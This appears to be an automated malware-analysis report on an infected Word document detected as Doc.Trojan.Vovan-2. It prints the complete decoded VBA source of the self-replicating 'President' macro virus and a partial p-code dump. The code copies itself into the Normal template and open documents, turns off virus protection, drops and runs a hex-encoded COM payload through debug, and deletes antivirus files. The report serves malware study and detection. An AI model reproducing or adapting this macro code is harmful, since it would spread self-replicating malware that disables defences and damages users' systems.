MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including an AutoOpen subroutine that triggers the execution of a 'Putsch' subroutine. This subroutine appears to disable virus protection and attempts to download or execute further malicious content, as indicated by the ClamAV detection 'Doc.Trojan.Vovan-2'. The use of AutoOpen and Shell() calls strongly suggests a macro-based malware dropper.
Heuristics 6
-
ClamAV: Doc.Trojan.Vovan-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Vovan-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "C:\WINDOWS\OFF.COM", 0 -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="President", Object:=wdOrganizerObjectProjectItems -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25148 bytes |
SHA-256: adfce46e08a0ce9e586b2e031eb26a36cda1145634eb8391f3d9d8ab56c46f91 |
|||
|
Detection
ClamAV:
Doc.Trojan.Vovan-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "picture"
Attribute VB_Base = "0{1DAE1287-F172-11D4-9CAB-20E94AC10000}{1DAE1278-F172-11D4-9CAB-20E94AC10000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()
MsgBox " Ну шта?"
End Sub
Attribute VB_Name = "President"
Sub AutoOpen()
If Application.ShowVisualBasicEditor = True Then Application.ShowVisualBasicEditor = False
On Error GoTo -1: On Error GoTo 1
Putsch
Application.ScreenUpdating = False
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="President", Object:=wdOrganizerObjectProjectItems
1:
On Error GoTo -1: On Error GoTo 2
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="picture", Object:=wdOrganizerObjectProjectItems
2:
ActiveDocument.Save
End Sub
Sub ToolsMacro()
Call Forma
End Sub
Sub FileTemplates()
Call Forma
End Sub
Sub ViewVBcode()
Call Forma
End Sub
Sub Organizer()
Call Forma
End Sub
Sub ToolsRecordMacroStart()
Call Forma
End Sub
Sub ToolsRecordMacroToggle()
Call Forma
End Sub
Sub AutoExec()
With Options
.VirusProtection = False
.AllowFastSave = False
.BackgroundSave = False
.CreateBackup = False
.SavePropertiesPrompt = False
.SaveInterval = 0
.SaveNormalPrompt = False
End With
On Error GoTo -1: On Error GoTo holiday
If Day(Now()) = 27 And Month(Now()) = 5 Then
Beep
MsgBox "Вас приветствует Великий и ужасный СПУТНИК!!!"
'MISTER VOVAN ITS NUMBER ONE!!!
End If
holiday:
End Sub
Sub AutoExit()
With Options
.VirusProtection = True
End With
Application.Quit
End Sub
Sub FileSave()
If Day(Now()) = Month(Now()) Then
Call Forma
End If
On Error GoTo -1: On Error GoTo Error
ActiveDocument.Save
On Error GoTo -1: On Error GoTo 3
Putsch
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="President", Object:=wdOrganizerObjectProjectItems
3:
On Error GoTo -1: On Error GoTo 4
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="picture", Object:=wdOrganizerObjectProjectItems
4:
ActiveDocument.Save
Error:
End Sub
Sub FileSaveAs()
If Day(Now()) = Month(Now()) Then
Call Forma
End If
On Error GoTo -1: On Error GoTo 5
Putsch
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="President", Object:=wdOrganizerObjectProjectItems
5:
On Error GoTo -1: On Error GoTo 6
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="picture", Object:=wdOrganizerObjectProjectItems
6:
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub Forma()
With Options
.VirusProtection = False
End With
Beep
StatusBar = "President"
Load picture
picture.Show
Set fs = Application.FileSearch
With fs
.LookIn = "C:\WINDOWS\"
.FileName = "OFF.COM"
If .Execute > 0 Then
ChDir "C:\WINDOWS\"
Shell "C:\WINDOWS\OFF.COM", 0
End
Else
Call off
End If
End With
End Sub
Sub FilePrint()
If Dialogs(wdDialogFilePrint).Show = -1 Then
With Options
.CheckSpellingAsYouType = False
.CheckGrammarAsYouType = False
End With
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "что "
.Replacement.Text = "шта "
.Forward = True
.Wrap = wdFindContinue
End With
Selection.Find.Execute Replace:=wdReplaceAll
With Selection.Find
.Text = " и "
.Replacement.Text = " и никуда я не уйду "
.Forward = True
.Wrap = wdFindContinue
End With
Selection.Find.Execute Replace:=wdReplaceAll
Selection.EndKey Unit:=wdStory
Selection.TypeParagraph
Selection.ParagraphFormat.Alignment = wdAlignParagraphRight
Selection.TypeText Text:="Ельцин Б.Н. понимаеш?"
Selection.HomeKey Unit:=wdStory
ActiveDocument.UndoClear
End If
End Sub
Sub FilePrintDefault()
Call FilePrint
End Sub
Sub ToolsOptions()
With Options
.VirusProtection = True
.CheckSpellingAsYouType = True
.CheckGrammarAsYouType = True
End With
If Dialogs(wdDialogToolsOptions).Show Then
End If
With Options
.VirusProtection = False
End With
End Sub
Sub HelpAbout()
Call Forma
End Sub
Sub FileOpen()
WordBasic.DisableAutoMacros
On Error GoTo -1: On Error GoTo 100
Dialogs(wdDialogFileOpen).Show
WordBasic.EnableAutoMacros
Call FileSave
100:
End Sub
Sub Putsch()
On Error Resume Next
Application.ScreenUpdating = False
Set Current = MacroContainer
For Grow = 1 To 5
Number = Current.VBProject.VBComponents("President").CodeModule.ProcCountLines("Putsch", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("President").CodeModule.InsertLines RandomLine, "rem " & Remark
Remark = ""
Next Grow
End Sub
Sub off()
Open "C:\WINDOWS\OFF.SCR" For Output As #1
Print #1, "N OFF.COM"
Print #1, "E 0100 42 59 20 53 45 52 47 45 59 20 5A 41 42 41 52 59"
Print #1, "E 0110 41 4E 53 4B 59 50 B4 4A BB 00 01 CD 21 0F 82 B6"
Print #1, "E 0120 00 B8 87 16 CD 2F 0B C0 0F 85 AB 00 89 3E 48 01"
Print #1, "E 0130 8C 06 4A 01 0B F6 74 0C 8B DE B4 48 CD 21 0F 82"
Print #1, "E 0140 95 00 8E C0 B8 01 00 9A 00 00 00 00 0F 82 87 00"
Print #1, "E 0150 0F 01 06 00 01 A0 05 01 A2 07 01 C7 06 05 01 F2"
Print #1, "E 0160 00 2B C0 B9 01 00 CD 31 72 6D A3 08 01 8B D8 B8"
Print #1, "E 0170 0C 00 66 BF 00 01 00 00 1E 07 CD 31 1E 07 8E 1E"
Print #1, "E 0180 08 01 66 B9 04 00 00 00 66 BE 08 00 00 00 66 BF"
Print #1, "E 0190 0A 01 00 00 F3 66 A5 06 1F 8C CB B8 0B 00 66 BF"
Print #1, "E 01A0 DC 01 00 00 CD 31 C6 06 E1 01 9A 8E 06 08 01 66"
Print #1, "E 01B0 B9 04 00 00 00 66 BE DC 01 00 00 66 BF 08 00 00"
Print #1, "E 01C0 00 F3 66 A5 9A 00 00 13 00 FA B0 8F E6 70 B0 00"
Print #1, "E 01D0 E6 71 B8 FE 00 E7 64 B8 00 4C CD 21 00 00 00 00"
Print #1, "E 01E0 00 00 00 00 C9 01 0B 00 00 EC 00 00"
Print #1, "RCX"
Print #1, "00EC"
Print #1, "W"
Print #1, "Q"
Close #1
Open "C:\WINDOWS\OFF.BAT" For Output As #1
Print #1, "@echo off"
Print #1, "debug < OFF.SCR"
Close #1
ChDir "C:\WINDOWS\"
Shell "C:\WINDOWS\OFF.BAT", 0
Dim PauseTime, Start, Finish
PauseTime = 10
Start = Timer
Do While Timer < Start + PauseTime
DoEvents
Loop
Finish = Timer
ChDir "C:\WINDOWS\"
Kill "C:\WINDOWS\OFF.BAT"
Kill "C:\WINDOWS\OFF.SCR"
On Error GoTo -1: On Error GoTo AVP
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
StatusBar = "Дума отправлена в отставку!"
AVP:
End
End Sub
'***************************************
'* Author of given MacroVirus is VOVAN *
'* MacroVirus.Word97 *
'* Name of President virus *
'* Ver 1.0 *
'***************************************
' Processing file: /tmp/qstore_mx7eba7y
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/picture - 1526 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' FuncDefn (Private Sub Image1_Click())
' Line #19:
' LitStr 0x0011 " Ну шта?"
' ArgsCall MsgBox 0x0001
' Line #20:
' EndSub
' Macros/VBA/President - 12436 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Ld Application
' MemLd ShowVisualBasicEditor
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' LitVarSpecial (False)
' Ld Application
' MemSt ShowVisualBasicEditor
' EndIf
' Line #2:
' OnError <crash>
' BoS 0x0000
' OnError 1
' Line #3:
' ArgsCall Putsch 0x0000
' Line #4:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #5:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Source
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0009 "President"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #6:
' LineNum 1
' BoS 0x0000
' Line #7:
' OnError <crash>
' BoS 0x0000
' OnError 2
' Line #8:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Source
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0007 "picture"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #9:
' LineNum 2
' BoS 0x0000
' Line #10:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #11:
' EndSub
' Line #12:
' FuncDefn (Sub ToolsMacro())
' Line #13:
' ArgsCall (Call) Forma 0x0000
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Sub FileTemplates())
' Line #16:
' ArgsCall (Call) Forma 0x0000
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Sub ViewVBcode())
' Line #19:
' ArgsCall (Call) Forma 0x0000
' Line #20:
' EndSub
' Line #21:
' FuncDefn (Sub Organizer())
' Line #22:
' ArgsCall (Call) Forma 0x0000
' Line #23:
' EndSub
' Line #24:
' FuncDefn (Sub ToolsRecordMacroStart())
' Line #25:
' ArgsCall (Call) Forma 0x0000
' Line #26:
' EndSub
' Line #27:
' FuncDefn (Sub ToolsRecordMacroToggle())
' Line #28:
' ArgsCall (Call) Forma 0x0000
' Line #29:
' EndSub
' Line #30:
' FuncDefn (Sub AutoExec())
' Line #31:
' StartWithExpr
' Ld Options
' With
' Line #32:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #33:
' LitVarSpecial (False)
' MemStWith AllowFastSave
' Line #34:
' LitVarSpecial (False)
' MemStWith BackgroundSave
' Line #35:
' LitVarSpecial (False)
' MemStWith CreateBackup
' Line #36:
' LitVarSpecial (False)
' MemStWith SavePropertiesPrompt
' Line #37:
' LitDI2 0x0000
' MemStWith SaveInterval
' Line #38:
' LitVarSpecial (False)
' MemStWith SaveNormalPrompt
' Line #39:
' EndWith
' Line #40:
' OnError <crash>
' BoS 0x0000
' OnError holiday
' Line #41:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x001B
' Eq
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0005
' Eq
' And
' IfBlock
' Line #42:
' ArgsCall Beep 0x0000
' Line #43:
' LitStr 0x002D "Вас приветствует Великий и ужасный СПУТНИК!!!"
' ArgsCall MsgBox 0x0001
' Line #44:
' QuoteRem 0x0000 0x001E "MISTER VOVAN ITS NUMBER ONE!!!"
' Line #45:
' EndIfBlock
' Line #46:
' Label holiday
' Line #47:
' EndSub
' Line #48:
' FuncDefn (Sub AutoExit())
' Line #49:
' StartWithExpr
' Ld Options
' With
' Line #50:
' LitVarSpecial (True)
' MemStWith VirusProtection
' Line #51:
' EndWith
' Line #52:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #53:
' EndSub
' Line #54:
' FuncDefn (Sub FileSave())
' Line #55:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Eq
' IfBlock
' Line #56:
' ArgsCall (Call) Forma 0x0000
' Line #57:
' EndIfBlock
' Line #58:
' OnError <crash>
' BoS 0x0000
' OnError Error
' Line #59:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #60:
' OnError <crash>
' BoS 0x0000
' OnError 3
' Line #61:
' ArgsCall Putsch 0x0000
' Line #62:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #63:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #64:
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Source
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0009 "President"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #65:
' LineNum 3
' BoS 0x0000
' Line #66:
' OnError <crash>
' BoS 0x0000
' OnError 4
' Line #67:
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Source
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0007 "picture"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #68:
' LineNum 4
' BoS 0x0000
' Line #69:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #70:
' Label Error
' Line #71:
' EndSub
' Line #72:
' FuncDefn (Sub FileSaveAs())
' Line #73:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Eq
' IfBlock
' Line #74:
' ArgsCall (Call) Forma 0x0000
' Line #75:
' EndIfBlock
' Line #76:
' OnError <crash>
' BoS 0x0000
' OnError 5
' Line #77:
' ArgsCall Putsch 0x0000
' Line #78:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #79:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #80:
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Source
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0009 "President"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #81:
' LineNum 5
' BoS 0x0000
' Line #82:
' OnError <crash>
' BoS 0x0000
' OnError 6
' Line #83:
' Ld NormalTemplate
' MemLd FullName
' ParamNamed Source
' Ld ActiveDocument
' MemLd FullName
' ParamNamed Destination
' LitStr 0x0007 "picture"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #84:
' LineNum 6
' BoS 0x0000
' Line #85:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #86:
' EndSub
' Line #87:
' FuncDefn (Sub Forma())
' Line #88:
' StartWithExpr
' Ld Options
' With
' Line #89:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #90:
' EndWith
' Line #91:
' ArgsCall Beep 0x0000
' Line #92:
' LitStr 0x0009 "President"
' St StatusBar
' Line #93:
' Ld picture
' ArgsCall Local 0x0001
' Line #94:
' Ld picture
' ArgsMemCall Show 0x0000
' Line #95:
' SetStmt
' Ld Application
' MemLd FileSearch
' Set fs
' Line #96:
' StartWithExpr
' Ld fs
' With
' Line #97:
' LitStr 0x000B "C:\WINDOWS\"
' MemStWith LookIn
' Line #98:
' LitStr 0x0007 "OFF.COM"
' MemStWith FileName
' Line #99:
' MemLdWith Execute
' LitDI2 0x0000
' Gt
' IfBlock
' Line #100:
' LitStr 0x000B "C:\WINDOWS\"
' ArgsCall ChDir 0x0001
' Line #101:
' LitStr 0x0012 "C:\WINDOWS\OFF.COM"
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #102:
' End
' Line #103:
' ElseBlock
' Line #104:
' ArgsCall (Call) off 0x0000
' Line #105:
' EndIfBlock
' Line #106:
' EndWith
' Line #107:
' EndSub
' Line #108:
' FuncDefn (Sub FilePrint())
' Line #109:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' MemLd Show
' LitDI2 0x0001
' UMi
' Eq
' IfBlock
' Line #110:
' StartWithExpr
' Ld Options
' With
' Line #111:
' LitVarSpecial (False)
' MemStWith CheckSpellingAsYouType
' Line #112:
' LitVarSpecial (False)
' MemStWith CheckGrammarAsYouType
' Line #113:
' EndWith
' Line #114:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #115:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #116:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #117:
' LitStr 0x0004 "что "
' MemStWith Then
' Line #118:
' LitStr 0x0004 "шта "
' MemLdWith Replacement
' MemSt Then
' Line #119:
' LitVarSpecial (True)
' MemStWith Forward
' Line #120:
' Ld wdFindContinue
' MemStWith Wrap
' Line #121:
' EndWith
' Line #122:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #123:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #124:
' LitStr 0x0003 " и "
' MemStWith Then
' Line #125:
' LitStr 0x0014 " и никуда я не уйду "
' MemLdWith Replacement
' MemSt Then
' Line #126:
' LitVarSpecial (True)
' MemStWith Forward
' Line #127:
' Ld wdFindContinue
' MemStWith Wrap
' Line #128:
' EndWith
' Line #129:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #130:
' Ld wdStory
' ParamNamed Unit
' Ld Selection
' ArgsMemCall EndKey 0x0001
' Line #131:
' Ld Selection
' ArgsMemCall TypeParagraph 0x0000
' Line #132:
' Ld wdAlignParagraphRight
' Ld Selection
' MemLd ParagraphFormat
' MemSt Alignment
' Line #133:
' LitStr 0x0015 "Ельцин Б.Н. понимаеш?"
' ParamNamed Then
' Ld Selection
' ArgsMemCall TypeText 0x0001
' Line #134:
' Ld wdStory
' ParamNamed Unit
' Ld Selection
' ArgsMemCall HomeKey 0x0001
' Line #135:
' Ld ActiveDocument
' ArgsMemCall UndoClear 0x0000
' Line #136:
' EndIfBlock
' Line #137:
' EndSub
' Line #138:
' FuncDefn (Sub FilePrintDefault())
' Line #139:
' ArgsCall (Call) FilePrint 0x0000
' Line #140:
' EndSub
' Line #141:
' FuncDefn (Sub ToolsOptions())
' Line #142:
' StartWithExpr
' Ld Options
' With
' Line #143:
' LitVarSpecial (True)
' MemStWith VirusProtection
' Line #144:
' LitVarSpecial (True)
' MemStWith CheckSpellingAsYouType
' Line #145:
' LitVarSpecial (True)
' MemStWith CheckGrammarAsYouType
' Line #146:
' EndWith
' Line #147:
' Ld wdDialogToolsOptions
' ArgsLd Dialogs 0x0001
' MemLd Show
' IfBlock
' Line #148:
' EndIfBlock
' Line #149:
' StartWithExpr
' Ld Options
' With
' Line #150:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #151:
' EndWith
' Line #152:
' EndSub
' Line #153:
' FuncDefn (Sub HelpAbout())
' Line #154:
' ArgsCall (Call) Forma 0x0000
' Line #155:
' EndSub
' Line #156:
' FuncDefn (Sub FileOpen())
' Line #157:
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0000
' Line #158:
' OnError <crash>
' BoS 0x0000
' OnError 100
' Line #159:
' Ld wdDialogFileOpen
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #160:
' Ld WordBasic
' ArgsMemCall EnableAutoMacros 0x0000
' Line #161:
' ArgsCall (Call) FileSave 0x0000
' Line #162:
' LineNum 100
' BoS 0x0000
' Line #163:
' EndSub
' Line #164:
' FuncDefn (Sub Putsch())
' Line #165:
' OnError (Resume Next)
' Line #166:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #167:
' SetStmt
' Ld MacroContainer
' Set Current
' Line #168:
' StartForVariable
' Ld Grow
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0005
' For
' Line #169:
' LitStr 0x0006 "Putsch"
' Ld vbext_pk_Proc
' LitStr 0x0009 "President"
' Ld Current
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd ProcCountLines 0x0002
' St Number
' Line #170:
' ArgsLd Rnd 0x0000
' Ld Number
' Mul
' LitDI2 0x0001
' Add
' FnInt
' St RandomLine
' Line #171:
' ArgsLd Rnd 0x0000
' LitDI2 0x0028
' Mul
' LitDI2 0x0001
' Add
' FnInt
' St RemarkLength
' Line #172:
' StartForVariable
' Ld Length
' EndForVariable
' LitDI2 0x0001
' Ld RemarkLength
' For
' Line #173:
' Ld Remark
' LitDI2 0x005A
' LitDI2 0x0041
' Sub
' LitDI2 0x0001
' Add
' Paren
' Ld Rnd
' Mul
' LitDI2 0x0041
' Add
' FnInt
' ArgsLd Chr$ 0x0001
' Add
' St Remark
' Line #174:
' StartForVariable
' Ld Length
' EndForVariable
' NextVar
' Line #175:
' Ld RandomLine
' LitStr 0x0004 "rem "
' Ld Remark
' Concat
' LitStr 0x0009 "President"
' Ld Current
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall InsertLines 0x0002
' Line #176:
' LitStr 0x0000 ""
' St Remark
' Line #177:
' StartForVariable
' Ld Grow
' EndForVariable
' NextVar
' Line #178:
' EndSub
' Line #179:
' FuncDefn (Sub off())
' Line #180:
' LitStr 0x0012 "C:\WINDOWS\OFF.SCR"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #181:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0009 "N OFF.COM"
' PrintItemNL
' Line #182:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "E 0100 42 59 20 53 45 52 47 45 59 20 5A 41 42 41 52 59"
' PrintItemNL
' Line #183:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "E 0110 41 4E 53 4B 59 50 B4 4A BB 00 01 CD 21 0F 82 B6"
' PrintItemNL
' Line #184:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "E 0120 00 B8 87 16 CD 2F 0B C0 0F 85 AB 00 89 3E 48 01"
' PrintItemNL
' Line #185:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "E 0130 8C 06 4A 01 0B F6 74 0C 8B DE B4 48 CD 21 0F 82"
' PrintItemNL
' Line #186:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "E 0140 95 00 8E C0 B8 01 00 9A 00 00 00 00 0F 82 87 00"
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.